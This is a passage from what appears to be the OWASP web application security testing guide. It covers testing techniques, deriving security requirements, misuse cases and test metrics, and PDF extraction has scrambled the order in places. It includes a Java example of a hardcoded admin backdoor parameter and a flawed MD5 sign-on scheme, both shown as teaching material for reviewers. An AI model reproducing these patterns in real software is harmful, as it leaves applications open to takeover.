to test the software development life-cycle process itself and to ensure that there is an adequate policy or skill set in place. As with many things in life, when conducting manual inspections and reviews it is recommended that a trust-but-verify model is adopted. Not everything that the tester is shown or told will be accurate. Manual reviews are particularly good for testing whether people understand the security process, have been made aware of policy, and have the appropriate skills to design or implement a secure application. Other activities, including manually reviewing the documentation, secure coding policies, security requirements, and architectural designs, should all be accomplished using manual inspections. Advantages: • Requires no supporting technology • Can be applied to a variety of situations • Flexible • Promotes teamwork • Early in the SDLC Disadvantages: • Can be time consuming • Supporting material not always available • Requires significant human thought and skill to be effective Threat Modeling Overview Threat modeling has become a popular technique to help system designers think about the security threats that their systems and applications might face. Therefore, threat modeling can be seen as risk assessment for applications. In fact, it enables the designer to develop mitigation strategies for potential vulnerabilities and helps them focus their inevitably limited resources and attention on the parts of the system that most require it. It is recommended that all applications have a threat model developed and documented. Threat models should be created as early as possible in the SDLC, and should be revisited as the application evolves and development progresses. To develop a threat model, we recommend taking a simple approach that follows the NIST 800-30 [11] standard for risk assessment. This approach involves: • Decomposing the application – use a process of manual inspection to understand how the application works, its assets, functionality, and connectivity. • Defining and classifying the assets – classify the assets into tangible and intangible assets and rank them according to business importance. • Exploring potential vulnerabilities - whether technical, operational,or management. • Exploring potential threats – develop a realistic view of potential attack vectors from an attacker’s perspective, by using threat scenarios or attack trees. • Creating mitigation strategies – develop mitigating controls for each of the threats deemed to be realistic. The output from a threat model itself can vary but is typically a collection of lists and diagrams. The OWASP Code Review Guide outlines an Application Threat Modeling methodology that can be used as a reference for the testing applications for potential security flaws in the design of the application. There is no right or wrong way to develop threat models and perform information risk assessments on applications. [12]. Advantages: • Practical attacker’s view of the system • Flexible • Early in the SDLC Disadvantages: • Relatively new technique • Good threat models don’t automatically mean good software Source Code Review Overview Source code review is the process of manually checking the source code of a web application for security issues. Many serious security vulnerabilities cannot be detected with any other form of analysis or testing. As the popular saying goes “if you want to know what’s really going on, go straight to the source.” Almost all security experts agree that there is no substitute for actually looking at the code. All the information for identifying security problems is there in the code somewhere. Unlike testing third party closed 14 Testing Guide Introduction software such as operating systems, when testing web applications (especially if they have been developed in-house) the source code should be made available for testing purposes. Many unintentional but significant security problems are also extremely difficult to discover with other forms of analysis or testing, such as penetration testing, making source code analysis the technique of choice for technical testing. With the source code, a tester can accurately determine what is happening (or is supposed to be happening) and remove the guess work of black box testing. Examples of issues that are particularly conducive to being found through source code reviews include concurrency problems, flawed business logic, access control problems, and cryptographic weaknesses as well as backdoors, Trojans, Easter eggs, time bombs, logic bombs, and other forms of malicious code. These issues often manifest themselves as the most harmful vulnerabilities in web sites. Source code analysis can also be extremely efficient to find implementation issues such as places where input validation was not performed or when fail open control procedures may be present. But keep in mind that operational procedures need to be reviewed as well, since the source code being deployed might not be the same as the one being analyzed herein [13]. Advantages: • Completeness and effectiveness • Accuracy • Fast (for competent reviewers) Disadvantages: • Requires highly skilled security developers • Can miss issues in compiled libraries • Cannot detect run-time errors easily • The source code actually deployed might differ from the one being analyzed For more on code review, checkout the OWASP code review project. Penetration Testing Overview Penetration testing has been a common technique used to test network security for many years. It is also commonly known as black box testing or ethical hacking. Penetration testing is essentially the “art” of testing a running application remotely to find security vulnerabilities, without knowing the inner workings of the application itself. Typically, the penetration test team would have access to an application as if they were users. The tester acts like an attacker and attempts to find and exploit vulnerabilities. In many cases the tester will be given a valid account on the system. While penetration testing has proven to be effective in network security, the technique does not naturally translate to applications. When penetration testing is performed on networks and operating systems, the majority of the work is involved in finding and then exploiting known vulnerabilities in specific technologies. As web applications are almost exclusively bespoke, penetration testing in the web application arena is more akin to pure research. Penetration testing tools have been developed that automate the process, but with the nature of web applications their effective- ness is usually poor. Many people today use web application penetration testing as their primary security testing technique. Whilst it certainly has its place in a testing program, we do not believe it should be considered as the primary or only testing technique. Gary McGraw in [14] summed up penetration testing well when he said, “If you fail a penetration test you know you have a very bad problem indeed. If you pass a penetration test you do not know that you don’t have a very bad problem”. However, focused penetration testing (i.e., testing that attempts to exploit known vulnerabilities detected in previous reviews) can be useful in detecting if some specific vulnerabilities are actually fixed in the source code deployed on the web site. Advantages: • Can be fast (and therefore cheap) • Requires a relatively lower skill-set than source code review • Tests the code that is actually being exposed Disadvantages: • Too late in the SDLC • Front impact testing only. The Need for a Balanced Approach With so many techniques and approaches to testing the security of web applications it can be difficult to understand which techniques to use and when to use them. Experience shows that there is no right or wrong answer to the question of exactly what techniques should be used to build a testing framework. In fact all techniques should probably be used to test all the areas that need to be tested. Although it is clear that there is no single technique that can be performed to effectively cover all security testing and ensure that all issues have been addressed, many companies adopt only one approach. The approach used has historically been penetration testing. Penetration testing, while useful, cannot effectively address many of the issues that need to be tested. It is simply “too little too late” in the software development life cycle (SDLC). The correct approach is a balanced approach that includes several techniques, from manual reviews to technical testing. A balanced approach should cover testing in all phases of the SDLC. This approach leverages the most appropriate techniques available depending on the current SDLC phase. Of course there are times and circumstances where only one technique is possible. For example, a test on a web application that has already been created, but where the testing party does not have access to the source code. In this case, penetration testing is clearly better than no testing at all. However, the testing parties should be encouraged to challenge assumptions, such as no access to source code, and to explore the possibility of more complete testing. A balanced approach varies depending on many factors, such as the maturity of the testing process and corporate culture. It is recommended that a balanced testing framework should look something like the representations shown in Figure 3 and Figure 4. The following figure shows a typical proportional representation over- 15 Testing Guide Introduction laid onto the software development life cycle. In keeping with research and experience, it is essential that companies place a higher emphasis on the early stages of development. 10 Figure 3: Proportion of Test Effort in SDLC 5% 0-1 %1 5 -1 10 35 % DEFINE DESIGN DEVELOP MAINTAIN 12 - 15 - 35% DEPLOY ‘Example 1: Magic Parameters’ Imagine a simple web application that accepts a name-value pair of “magic” and then the value. For simplicity, the GET request may be: http://www.host/application?magic=value To further simplify the example, the values in this case can only be ASCII characters a – z (upper or lowercase) and integers 0 – 9. The designers of this application created an administrative backdoor during testing, but obfuscated it to prevent the casual observer from discovering it. By submitting the value sf8g7sfjdsurtsdieerwqredsgnfg8d (30 characters), the user will then be logged in and presented with an administrative screen with total control of the application. The HTTP request is now: http://www.host/application?magic= sf8g7sfjdsurtsdieerwqredsgnfg8d % 25 Given that all of the other parameters were simple two- and three-characters fields, it is not possible to start guessing combinations at approximately 28 characters. A web application scanner will need to brute force (or guess) the entire key space of 30 characters. That is up to 30^28 permutations, or trillions of HTTP requests. That is an electron in a digital haystack. The code for this exemplar Magic Parameter check may look like the following: The following figure shows a typical proportional representation overlaid onto testing techniques. Figure 4: Proportion of Test Effort According to Test Technique PROCESS REVIEWS & MANUAL INSPECTIONS CODE REVIEW SECURITY TESTING A Note about Web Application Scanners Many organizations have started to use automated web application scanners. While they undoubtedly have a place in a testing program, some fundamental issues need to be highlighted about why it is believed that automating black box testing is not (or will ever be) effective. However, highlighting these issues should not discourage the use of web application scanners. Rather, the aim is to ensure the limitations are understood and testing frameworks are planned appropriately. Important: OWASP is currently working to develop a web application scanner bench marking platform. The following examples show why automated black box testing is not effective. public void doPost( HttpServletRequest request, HttpServletResponse response) { String magic = “sf8g7sfjdsurtsdieerwqredsgnfg8d”; boolean admin = magic.equals( request.getParameter(“magic”)); if (admin) doAdmin( request, response); else …. // normal processing } By looking in the code, the vulnerability practically leaps off the page as a potential problem. Example 2: Bad Cryptography Cryptography is widely used in web applications. Imagine that a developer decided to write a simple cryptography algorithm to sign a user in from site A to site B automatically. In his/her wisdom, the developer decides that if a user is logged into site A, then he/she will generate a key using an MD5 hash function that comprises: Hash { username : date } When a user is passed to site B, he/she will send the key on the query string to site B in an HTTP re-direct. Site B independently computes the hash, and compares it to the hash passed on the request. If they match, site B signs the user in as the user they claim to be. As the scheme is explained the inadequacies can be worked out. Anyone that figures out the scheme (or is told how it works, or downloads the information from Bugtraq) can log in as any user. Manual inspection, such as a review or code inspection, would have uncovered this security issue quickly. A black-box web application scanner would not have uncovered the vulnerability. It would have seen a 128-bit hash that changed with each user, and by the nature of hash functions, did not change in any predictable way. 16 Testing Guide Introduction A Note about Static Source Code Review Tools Many organizations have started to use static source code scanners. While they undoubtedly have a place in a comprehensive testing program, it is necessary to highlight some fundamental issues about why this approach is not effective when used alone. Static source code analysis alone cannot identify issues due to flaws in the design, since it cannot understand the context in which the code is constructed. Source code analysis tools are useful in determining security issues due to coding errors, however significant manual effort is required to validate the findings. Deriving Security Test Requirements To have a successful testing program, one must know what the testing objectives are. These objectives are specified by the security requirements. This section discusses in detail how to document requirements for security testing by deriving them from applicable standards and regulations, and from positive and negative application requirements. It also discusses how security requirements effectively drive security testing during the SDLC and how security test data can be used to effectively manage software security risks. Testing Objectives One of the objectives of security testing is to validate that security controls operate as expected. This is documented via security requirements that describe the functionality of the security control. At a high level, this means proving confidentiality, integrity, and availability of the data as well as the service. The other objective is to validate that security controls are implemented with few or no vulnerabilities. These are common vulnerabilities, such as the OWASP Top Ten, as well as vulnerabilities that have been previously identified with security assessments during the SDLC, such as threat modelling, source code analysis, and penetration test. Security Requirements Documentation The first step in the documentation of security requirements is to understand the business requirements. A business requirement document can provide initial high-level information on the expected functionality of the application. For example, the main purpose of an application may be to provide financial services to customers or to allow goods to be purchased from an on-line catalog. A security section of the business requirements should highlight the need to protect the customer data as well as to comply with applicable security documentation such as regulations, standards, and policies. A general checklist of the applicable regulations, standards, and policies is a good preliminary security compliance analysis for web applications. For example, compliance regulations can be identified by checking information about the business sector and the country or state where the application will operate. Some of these compliance guidelines and regulations might translate into specific technical requirements for security controls. For example, in the case of financial applications, the compliance with FFIEC guidelines for authentication [15] requires that financial institutions implement applications that mitigate weak authentication risks with multi-layered security control and multi-factor authentication. Applicable industry standards for security need also to be captured by the general security requirement checklist. For example, in the case of applications that handle customer credit card data, the compliance with the PCI DSS [16] standard forbids the storage of PINs and CVV2 data and requires that the merchant protect magnetic strip data in storage and transmission with encryption and on display by masking. Such PCI DSS security requirements could be validated via source code analysis. Another section of the checklist needs to enforce general requirements for compliance with the organization’s information security standards and policies. From the functional requirements perspective, requirements for the security control need to map to a specific section of the information security standards. An example of such requirement can be: “a password complexity of six alphanumeric characters must be enforced by the authentication controls used by the application.” When security requirements map to compliance rules a security test can validate the exposure of compliance risks. If violation with information security standards and policies are found, these will result in a risk that can be documented and that the business has to manage. Since these security compliance requirements are enforceable, they need to be well documented and validated with security tests. Security Requirements Validation From the functionality perspective, the validation of security requirements is the main objective of security testing. From the risk management perspective, the validation of security requirements is the objective of information security assessments. At a high level, the main goal of information security assessments is the identification of gaps in security controls, such as lack of basic authentication, authorization, or encryption controls. More in depth, the security assessment objective is risk analysis, such as the identification of potential weaknesses in security controls that ensure the confidentiality, integrity, and availability of the data. For example, when the application deals with personal identifiable information (PII) and sensitive data, the security requirement to be validated is the compliance with the company information security policy requiring encryption of such data in transit and in storage. Assuming encryption is used to protect the data, encryption algorithms and key lengths need to comply with the organization encryption standards. These might require that only certain algorithms and key lengths could be used. For example, a security requirement that can be security tested is verifying that only allowed ciphers are used (e.g., SHA-256, RSA, AES) with allowed minimum key lengths (e.g., more than 128 bit for symmetric and more than 1024 for asymmetric encryption). From the security assessment perspective, security requirements can be validated at different phases of the SDLC by using different artifacts and testing methodologies. For example, threat modeling focuses on identifying security flaws during design, secure code analysis and reviews focus on identifying security issues in source code during development, and penetration testing focuses on identifying vulnerabilities in the application during testing or validation. Security issues that are identified early in the SDLC can be documented in a test plan so they can be validated later with security tests. By combining the results of different testing techniques, it is possible to derive better security test cases and increase the level of assurance of the security requirements. For example, distinguishing true vulnerabilities from the un-exploitable ones is possible when the results of penetration tests and source code analysis are combined. Considering the security test for a SQL injection vulnerability, for example, a black box test might first involve a scan of the application to fingerprint the vulnerability. The first evidence of a potential SQL injection vulnerability that can be validated is the generation of a SQL exception. A further 17 Testing Guide Introduction validation of the SQL vulnerability might involve manually injecting attack vectors to modify the grammar of the SQL query for an information disclosure exploit. This might involve a lot of trial-and-error analysis until the malicious query is executed. Assuming the tester has the source code, she might learn from the source code analysis on how to construct the SQL attack vector that can exploit the vulnerability (e.g., execute a malicious query returning confidential data to unauthorized user). Threats and Countermeasures Taxonomies A threat and countermeasure classification, which takes into consideration root causes of vulnerabilities, is the critical factor in verifying that security controls are designed, coded, and built to mitigate the impact of the exposure of such vulnerabilities. In the case of web applications, the exposure of security controls to common vulnerabilities, such as the OWASP Top Ten, can be a good starting point to derive general security requirements. More specifically, the web application security frame [17] provides a classification (e.g. taxonomy) of vulnerabilities that can be documented in different guidelines and standards and validated with security tests. The focus of a threat and countermeasure categorization is to define security requirements in terms of the threats and the root cause of the vulnerability. A threat can be categorized by using STRIDE [18] as Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, and Elevation of privilege. The root cause can be categorized as security flaw in design, a security bug in coding, or an issue due to insecure configuration. For example, the root cause of weak authentication vulnerability might be the lack of mutual authentication when data crosses a trust boundary between the client and server tiers of the application. A security requirement that captures the threat of non-repudiation during an architecture design review allows for the documentation of the requirement for the countermeasure (e.g., mutual authentication) that can be validated later on with security tests. A threat and countermeasure categorization for vulnerabilities can also be used to document security requirements for secure coding such as secure coding standards. An example of a common coding error in authentication controls consists of applying an hash function to encrypt a password, without applying a seed to the value. From the secure coding perspective, this is a vulnerability that affects the encryption used for authentication with a vulnerability root cause in a coding error. Since the root cause is insecure coding the security requirement can be documented in secure coding standards and validated through secure code reviews during the development phase of the SDLC. Security Testing and Risk Analysis Security requirements need to take into consideration the severity of the vulnerabilities to support a risk mitigation strategy. Assuming that the organization maintains a repository of vulnerabilities found in applications (i.e, a vulnerability knowledge base), the security issues can be reported by type, issue, mitigation, root cause, and mapped to the applications where they are found. Such a vulnerability knowledge base can also be used to establish a metrics to analyze the effectiveness of the security tests throughout the SDLC. For example, consider an input validation issue, such as a SQL injection, which was identified via source code analysis and reported with a coding error root cause and input validation vulnerabil- ity type. The exposure of such vulnerability can be assessed via a penetration test, by probing input fields with several SQL injection attack vectors. This test might validate that special characters are filtered before hitting the database and mitigate the vulnerability. By combining the results of source code analysis and penetration testing it is possible to determine the likelihood and exposure of the vulnerability and calculate the risk rating of the vulnerability. By reporting vulnerability risk ratings in the findings (e.g., test report) it is possible to decide on the mitigation strategy. For example, high and medium risk vulnerabilities can be prioritized for remediation, while low risk can be fixed in further releases. By considering the threat scenarios of exploiting common vulnerabilities it is possible to identify potential risks that the application security control needs to be security tested for. For example, the OWASP Top Ten vulnerabilities can be mapped to attacks such as phishing, privacy violations, identify theft, system compromise, data alteration or data destruction, financial loss, and reputation loss. Such issues should be documented as part of the threat scenarios. By thinking in terms of threats and vulnerabilities, it is possible to devise a battery of tests that simulate such attack scenarios. Ideally, the organization vulnerability knowledge base can be used to derive security risk driven tests cases to validate the most likely attack scenarios. For example, if identity theft is considered high risk, negative test scenarios should validate the mitigation of impacts deriving from the exploit of vulnerabilities in authentication, cryptographic controls, input validation, and authorization controls. Deriving Functional and Non Functional Test Requirements Functional Security Requirements From the perspective of functional security requirements, the applicable standards, policies and regulations drive both the need for a type of security control as well as the control functionality. These requirements are also referred to as “positive requirements”, since they state the expected functionality that can be validated through security tests. Examples of positive requirements are: “the application will lockout the user after six failed log on attempts” or “passwords need to be a minimum of six alphanumeric characters”. The validation of positive requirements consists of asserting the expected functionality and can be tested by re-creating the testing conditions and running the test according to predefined inputs. The results are then shown as as a fail or pass condition. In order to validate security requirements with security tests, security requirements need to be function driven and they need to highlight the expected functionality (the what) and implicitly the implementation (the how). Examples of high-level security design requirements for authentication can be: • Protect user credentials and shared secrets in transit and in storage • Mask any confidential data in display (e.g., passwords, accounts) • Lock the user account after a certain number of failed log in attempts • Do not show specific validation errors to the user as a result of a failed log on • Only allow passwords that are alphanumeric, include special characters and six characters minimum length, to limit the attack surface 18 Testing Guide Introduction • Allow for password change functionality only to authenticated users by validating the old password, the new password, and the user answer to the challenge question, to prevent brute forcing of a password via password change. • The password reset form should validate the user’s username and the user’s registered email before sending the temporary password to the user via email. The temporary password issued should be a one time password. A link to the password reset web page will be sent to the user. The password reset web page should validate the user temporary password, the new password, as well as the user answer to the challenge question. Risk Driven Security Requirements Security tests need also to be risk driven, that is they need to validate the application for unexpected behavior. These are also called “negative requirements”, since they specify what the application should not do. Examples of negative requirements are: • The application should not allow for the data to be altered or destroyed • The application should not be compromised or misused for unauthorized financial transactions by a malicious user. Negative requirements are more difficult to test, because there is no expected behavior to look for. This might require a threat analyst to come up with unforeseeable input conditions, causes, and effects. This is where security testing needs to be driven by risk analysis and threat modeling. The key is to document the threat scenarios and the functionality of the countermeasure as a factor to mitigate a threat. For example, in the case of authentication controls, the following security requirements can be documented from the threats and countermeasure perspective: • Encrypt authentication data in storage and transit to mitigate risk of information disclosure and authentication protocol attacks • Encrypt passwords using non reversible encryption such as using a digest (e.g., HASH) and a seed to prevent dictionary attacks • Lock out accounts after reaching a log on failure threshold and enforce password complexity to mitigate risk of brute force password attacks • Display generic error messages upon validation of credentials to mitigate risk of account harvesting or enumeration • Mutually authenticate client and server to prevent non-repudiation and Man In the Middle (MiTM) attacks Threat modeling tools such as threat trees and attack libraries can be useful to derive the negative test scenarios. A threat tree will assume a root attack (e.g., attacker might be able to read other users’ messages) and identify different exploits of security controls (e.g., data validation fails because of a SQL injection vulnerability) and necessary countermeasures (e.g., implement data validation and parametrized queries) that could be validated to be effective in mitigating such attacks. Deriving Security Test Requirements Through Use and Misuse Cases A prerequisite to describing the application functionality is to un- derstand what the application is supposed to do and how. This can be done by describing use cases. Use cases, in the graphical form as commonly used in software engineering, show the interactions of actors and their relations. They help to identify the actors in the application, their relationships, the intended sequence of actions for each scenario, alternative actions, special requirements, preconditions and and post-conditions. Similar to use cases, misuse and abuse cases [19] describe unintended and malicious use scenarios of the application. These misuse cases provide a way to describe scenarios of how an attacker could misuse and abuse the application. By going through the individual steps in a use scenario and thinking about how it can be maliciously exploited, potential flaws or aspects of the application that are not well-defined can be discovered. The key is to describe all possible or, at least, the most critical use and misuse scenarios. Misuse scenarios allow the analysis of the application from the attacker’s point of view and contribute to identifying potential vulnerabilities and the countermeasures that need to be implemented to mitigate the impact caused by the potential exposure to such vulnerabilities. Given all of the use and abuse cases, it is important to analyze them to determine which of them are the most critical ones and need to be documented in security requirements. The identification of the most critical misuse and abuse cases drives the documentation of security requirements and the necessary controls where security risks should be mitigated. To derive security requirements from use and misuse case [20] it is important to define the functional scenarios and the negative scenarios and put these in graphical form. In the case of derivation of security requirements for authentication, for example, the following step-by-step methodology can be followed. Step 1: Describe the Functional Scenario: User authenticates by supplying a username and password. The application grants access to users based upon authentication of user credentials by the application and provides specific errors to the user when validation fails. Step 2: Describe the Negative Scenario: Attacker breaks the authentication through a brute force or dictionary attack of passwords and account harvesting vulnerabilities in the application. The validation errors provide specific information to an attacker to guess which accounts are actually valid registered accounts (usernames). Then the attacker will try to brute force the password for such a valid account. A brute force attack to four minimum length all digit passwords can succeed with a limited number of attempts (i.e., 10^4). Step 3: Describe Functional and Negative Scenarios With Use and Misuse Case: The graphical example in Figure below depicts the derivation of security requirements via use and misuse cases. The functional scenario consists of the user actions (enteringa username and password) and the application actions (authenticating the user and providing an error message if validation fails). The misuse case consists of the attacker actions, i.e. trying to break authentication by brute forcing the password via a dictionary attack and by guessing the valid usernames from error messages. By graphically representing the threats to the user actions (misuses), it is possible to derive the countermeasures as the application actions that mitigate such threats. 19 Testing Guide Introduction the application build, the results of the static and dynamic analysis should be reviewed and validated. USER Enter username and password Includes User authentiction Brute force authentication Includes APPLICATION / SERVER Show generic error message Harvest (guess) valid user accounts HACKER / MALICIOUS USER Includes Look account after N failed login attempts Dictionary attacks Includes Validate password minimum lenght and complexity Step 4: Elicit The Security Requirements. In this case, the following security requirements for authentication are derived: 1) Passwords need to be alphanumeric, lower and upper case and minimum of seven character length 2) Accounts need to lockout after five unsuccessful log in attempt 3) Log in error messages need to be generic These security requirements need to be documented and tested. Security Tests Integrated in Development and Testing Workflows Security Testing in the Development Workflow Security testing during the development phase of the SDLC represents the first opportunity for developers to ensure that the individual software components they have developed are security tested before they are integrated with other components and built into the application. Software components might consist of software artifacts such as functions, methods, and classes, as well as application programming interfaces, libraries, and executable files. For security testing, developers can rely on the results of the source code analysis to verify statically that the developed source code does not include potential vulnerabilities and is compliant with the secure coding standards. Security unit tests can further verify dynamically (i.e., at run time) that the components function as expected. Before integrating both new and existing code changes in The validation of source code before integration in application builds is usually the responsibility of the senior developer. Such senior developers are also the subject matter experts in software security and their role is to lead the secure code review. They must make decisions on whether to accept the code to be released in the application build or to require further changes and testing. This secure code review workflow can be enforced via formal acceptance as well as a check in a workflow management tool. For example, assuming the typical defect management workflow used for functional bugs, security bugs that have been fixed by a developer can be reported on a defect or change management system. The build master can look at the test results reported by the developers in the tool and grant approvals for checking in the code changes into the application build. Security Testing in the Test Workflow After components and code changes are tested by developers and checked in to the application build, the most likely next step in the software development process workflow is to perform tests on the application as a whole entity. This level of testing is usually referred to as integrated test and system level test. When security tests are part of these testing activities they can be used to validate both the security functionality of the application as a whole, as well as the exposure to application level vulnerabilities.These security tests on the application include both white box testing, such as source code analysis, and black box testing, such as penetration testing. Gray box testing is similar to Black box testing. In a gray box testing it is assumed that the tester has some partial knowledge about the session management of the application, and that should help in understanding whether the log out and timeout functions are properly secured. The target for the security tests is the complete system that will be potentially attacked and includes both the whole source code and the executable. One peculiarity of security testing during this phase is that it is possible for security testers to determine whether vulnerabilities can be exploited and expose the application to real risks. These include common web application vulnerabilities, as well as security issues that have been identified earlier in the SDLC with other activities such as threat modeling, source code analysis, and secure code reviews. Usually testing engineers, rather then software developers, perform security tests when the application is in scope for integration system tests. Such testing engineers have security knowledge of web application vulnerabilities, black box and white box security testing techniques, and own the validation of security requirements in this phase. In order to perform such security tests, it is a prerequisite that security test cases are documented in the security testing guidelines and procedures. A testing engineer who validates the security of the application in the integrated system environment might release the application for testing in the operational environment (e.g., user acceptance tests). At this stage of the SDLC (i.e., validation), the application functional testing is usually a responsibility of QA testers, while white-hat hackers or security consultants are usually responsible for security testing. Some organizations rely on their own specialized ethical hacking team to conduct such tests when a third party 20 Testing Guide Introduction assessment is not required (such as for auditing purposes). Since these tests are the last resort for fixing vulnerabilities before the application is released to production, it is important that such issues are addressed as recommended by the testing team. The recommendations can include code, design, or configuration change. At this level, security auditors and information security officers discuss the reported security issues and analyze the potential risks according to information risk management procedures. Such procedures might require the development team to fix all high risk vulnerabilities before the application can be deployed, unless such risks are acknowledged and accepted. Developers’ Security Tests Security Testing in the Coding Phase: Unit Tests From the developer’s perspective, the main objective of security tests is to validate that code is being developed in compliance with secure coding standards requirements. Developers’ own coding artifacts (such as functions, methods, classes, APIs, and libraries) need to be functionally validated before being integrated into the application build. The security requirements that developers have to follow should be documented in secure coding standards and validated with static and dynamic analysis. If the unit test activity follows a secure code review, unit tests can validate that code changes required by secure code reviews are properly implemented. Secure code reviews and source code analysis through source code analysis tools help developers in identifying security issues in source code as it is developed. By using unit tests and dynamic analysis (e.g., debugging) developers can validate the security functionality of components as well as verify that the countermeasures being developed mitigate any security risks previously identified through threat modeling and source code analysis. the case of security functional tests, unit level tests can test the functionality of security controls at the software component level, such as functions, methods, or classes. For example, a test case could validate input and output validation (e.g., variable sanitation) and boundary checks for variables by asserting the expected functionality of the component. The threat scenarios identified with use and misuse cases can be used to document the procedures for testing software components. In the case of authentication components, for example, security unit tests can assert the functionality of setting an account lockout as well as the fact that user input parameters cannot be abused to bypass the account lockout (e.g., by setting the account lockout counter to a negative number). At the component level, security unit tests can validate positive assertions as well as negative assertions, such as errors and exception handling. Exceptions should be caught without leaving the system in an insecure state, such as potential denial of service caused by resources not being de-allocated (e.g., connection handles not closed within a final statement block), as well as potential elevation of privileges (e.g., higher privileges acquired before the exception is thrown and not re-set to the previous level before exiting the function). Secure error handling can validate potential information disclosure via informative error messages and stack traces. Unit level security test cases can be developed by a security engineer who is the subject matter expert in software security and is also responsible for validating that the security issues in the source code have been fixed and can be checked into the integrated system build. Typically, the manager of the application builds also makes sure that third-party libraries and executable files are security assessed for potential vulnerabilities before being integrated in the application build. A good practice for developers is to build security test cases as a generic security test suite that is part of the existing unit testing framework. A generic security test suite could be derived from previously defined use and misuse cases to security test functions, methods and classes. A generic security test suite might include security test cases to validate both positive and negative requirements for security controls such as: Threat scenarios for common vulnerabilities that have root causes in insecure coding can also be documented in the developer’s security testing guide. When a fix is implemented for a coding defect identified with source code analysis, for example, security test cases can verify that the implementation of the code change follows the secure coding requirements documented in the secure coding standards. • Identity, Authentication & Access Control • Input Validation & Encoding • Encryption • User and Session Management • Error and Exception Handling • Auditing and Logging Source code analysis and unit tests can validate that the code change mitigates the vulnerability exposed by the previously identified coding defect. The results of automated secure code analysis can also be used as automatic check-in gates for version control, for example software artifacts cannot be checked into the build with high or medium severity coding issues. Developers empowered with a source code analysis tool integrated into their IDE, secure coding standards, and a security unit testing framework can assess and verify the security of the software components being developed. Security test cases can be run to identify potential security issues that have root causes in source code: besides input and output validation of parameters entering and exiting the components, these issues include authentication and authorization checks done by the component, protection of the data within the component, secure exception and error handling, and secure auditing and logging. Unit test frameworks such as Junit, Nunit, and CUnit can be adapted to verify security test requirements. In Functional Testers’ Security Tests Security Testing During the Integration and Validation Phase: Integrated System Tests and Operation Tests The main objective of integrated system tests is to validate the “defense in depth” concept, that is, that the implementation of security controls provides security at different layers. For example, the lack of input validation when calling a component integrated with the application is often a factor that can be tested with integration testing. The integration system test environment is also the first environ- 21 Testing Guide Introduction ment where testers can simulate real attack scenarios as can be potentially executed by a malicious external or internal user of the application. Security testing at this level can validate whether vulnerabilities are real and can be exploited by attackers. For example, a potential vulnerability found in source code can be rated as high risk because of the exposure to potential malicious users, as well as because of the potential impact (e.g., access to confidential information). with the exception of the data (e.g., test data is used in place of real data). A characteristic of security testing in UAT is testing for security configuration issues. In some cases these vulnerabilities might represent high risks. For example, the server that hosts the web application might not be configured with minimum privileges, valid SSL certificate and secure configuration, essential services disabled and web root directory not cleaned from test and administration web pages. Real attack scenarios can be tested with both manual testing techniques and penetration testing tools. Security tests of this type are also referred to as ethical hacking tests. From the security testing perspective, these are risk driven tests and have the objective of testing the application in the operational environment. The target is the application build that is representative of the version of the application being deployed into production. Security Test Data Analysis and Reporting Including security testing in the integration and validation phase is critical to identifying vulnerabilities due to integration of components as well as validating the exposure of such vulnerabilities. Application security testing requires a specialized set of skills, including both software and security knowledge, that are not typical of security engineers.As a result organizations are often required to security-train their software developers on ethical hacking techniques, security assessment procedures and tools. A realistic scenario is to develop such resources in-house and document them in security testing guides and procedures that take into account the developer’s security testing knowledge. A so called “security test cases cheat list or check-list”, for example, can provide simple test cases and attack vectors that can be used by testers to validate exposure to common vulnerabilities such as spoofing, information disclosures, buffer overflows, format strings, SQL injection and XSS injection, XML, SOAP, canonicalization issues, denial of service and managed code and ActiveX controls (e.g., .NET). A first battery of these tests can be performed manually with a very basic knowledge of software security. The first objective of security tests might be the validation of a set of minimum security requirements. These security test cases might consist of manually forcing the application into error and exceptional states and gathering knowledge from the application behavior. For example, SQL injection vulnerabilities can be tested manually by injecting attack vectors through user input and by checking if SQL exceptions are thrown back the user. The evidence of a SQL exception error might be a manifestation of a vulnerability that can be exploited. A more in-depth security test might require the tester’s knowledge of specialized testing techniques and tools. Besides source code analysis and penetration testing, these techniques include, for example, source code and binary fault injection, fault propagation analysis and code coverage, fuzz testing, and reverse engineering. The security testing guide should provide procedures and recommend tools that can be used by security testers to perform such in-depth security assessments. The next level of security testing after integration system tests is to perform security tests in the user acceptance environment. There are unique advantages to performing security tests in the operational environment. The user acceptance tests environment (UAT) is the one that is most representative of the release configuration, Goals for Security Test Metrics and Measurements Defining the goals for the security testing metrics and measurements is a prerequisite for using security testing data for risk analysis and management processes. For example, a measurement such as the total number of vulnerabilities found with security tests might quantify the security posture of the application. These measurements also help to identify security objectives for software security testing.For example, reducing the number of vulnerabilities to an acceptable number (minimum) before the application is deployed into production. Another manageable goal could be to compare the application security posture against a baseline to assess improvements in application security processes. For example, the security metrics baseline might consist of an application that was tested only with penetration tests. The security data obtained from an application that was also security tested during coding should show an improvement (e.g., fewer number of vulnerabilities) when compared with the baseline. In traditional software testing, the number of software defects, such as the bugs found in an application, could provide a measure of software quality. Similarly, security testing can provide a measure of software security. From the defect management and reporting perspective, software quality and security testing can use similar categorizations for root causes and defect remediation efforts. From the root cause perspective, a security defect can be due to an error in design (e.g., security flaws) or due to an error in coding (e.g., security bug). From the perspective of the effort required to fix a defect, both security and quality defects can be measured in terms of developer hours to implement the fix, the tools and resources required to fix, and the cost to implement the fix. A characteristic of security test data, compared to quality data, is the categorization in terms of the threat, the exposure of the vulnerability, and the potential impact posed by the vulnerability to determine the risk. Testing applications for security consists of managing technical risks to make sure that the application countermeasures meet acceptable levels. For this reason, security testing data needs to support the security risk strategy at critical checkpoints during the SDLC. For example, vulnerabilities found in source code with source code analysis represent an initial measure of risk. A measure of risk (e.g., high, medium, low) for the vulnerability can be calculated by determining the exposure and likelihood factors and by validating the vulnerability with penetration tests. The risk metrics associated to vulnerabilities found with security tests empower business management to make risk management decisions, such as to decide whether risks can be accepted, mitigated, or transferred at different levels within the organization (e.g., business as well as technical risks). 22 Testing Guide Introduction When evaluating the security posture of an application it is important to take into consideration certain factors, such as the size of the application being developed. Application size has been statistically proven to be related to the number of issues found in the application during testing. One measure of application size is the number of lines of code (LOC) of the application. Typically, software quality defects range from about 7 to 10 defects per thousand lines of new and changed code [21]. Since testing can reduce the overall number by about 25% with one test alone, it is logical for larger size applications to be tested more often than smaller size applications. When security testing is done in several phases of the SDLC, the test data can prove the capability of the security tests in detecting vulnerabilities as soon as they are introduced. The test data can also prove the effectiveness of removing the vulnerabilities by implementing countermeasures at different checkpoints of the SDLC. A measurement of this type is also defined as “containment metrics” and provides a measure of the ability of a security assessment performed at each phase of the development process to maintain security within each phase. These containment metrics are also a critical factor in 